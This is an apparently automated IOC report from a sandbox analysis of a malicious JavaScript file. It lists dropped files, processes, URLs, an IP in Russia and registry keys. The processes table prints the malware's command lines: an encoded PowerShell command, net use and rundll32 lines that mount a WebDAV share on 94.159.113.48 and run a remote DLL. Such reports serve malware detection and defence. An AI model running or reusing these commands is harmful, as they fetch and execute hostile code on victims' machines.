IOC Report
212481723992301695.js


Files

File Path | Type | Category | Malicious
212481723992301695.js | ASCII text, with very long lines (65536), with no line terminators | initial sample | malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log | data | dropped |
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db | Extensible storage user DataBase, version 0x620, checksum 0x7755ad4e, page size 16384, DirtyShutdown, Windows version 10.0 | dropped |
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm | data | dropped |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | data | dropped |
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_et224qok.zih.ps1 | ASCII text, with no line terminators | dropped |
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fbg0jaaa.fyl.psm1 | ASCII text, with no line terminators | dropped |
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp | JSON data | dropped |

Processes

Path | Cmdline | Malicious
C:\Windows\System32\wscript.exe | C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\212481723992301695.js" | malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANAA4AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAOQA0AC4AMQA1ADkALgAxADEAMwAuADQAOABAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMgA0ADAAOAAxADgANQAxADAANQAyADQAMQAuAGQAbABsACwARQBuAHQAcgB5AA== | malicious
C:\Windows\System32\rundll32.exe | "C:\Windows\system32\rundll32.exe" \\94.159.113.48@8888\davwwwroot\2408185105241.dll,Entry | malicious
C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
C:\Windows\System32\net.exe | "C:\Windows\system32\net.exe" use \\94.159.113.48@8888\davwwwroot\ |
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS |

URLs

Name | IP | Malicious
http://94.159.113.48:8888/U | unknown |
https://g.live.com/odclientsettings/ProdV21C: | unknown |
http://94.159.113.48:8888/2 | unknown |
http://94.159.113.48:8888/R | unknown |
http://crl.ver) | unknown |
https://g.live.com/odclientsettings/Prod1C: | unknown |
https://aka.ms/pscore68 | unknown |
http://94.159.113.48:8888/sacef | unknown |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | unknown |
http://94.159.113.48:8888/ | unknown |

Domains

Name | IP | Malicious
ax-0001.ax-dc-msedge.net | 150.171.29.10 |

IPs

IP | Domain | Country | Malicious
94.159.113.48 | unknown | Russian Federation | malicious
127.0.0.1 | unknown | unknown |

Registry

Path | Value | Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe | JScriptSetScriptStateStarted |
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS | PerfMMFileName |

Memdumps

Base Address | Regiontype | Protect | Malicious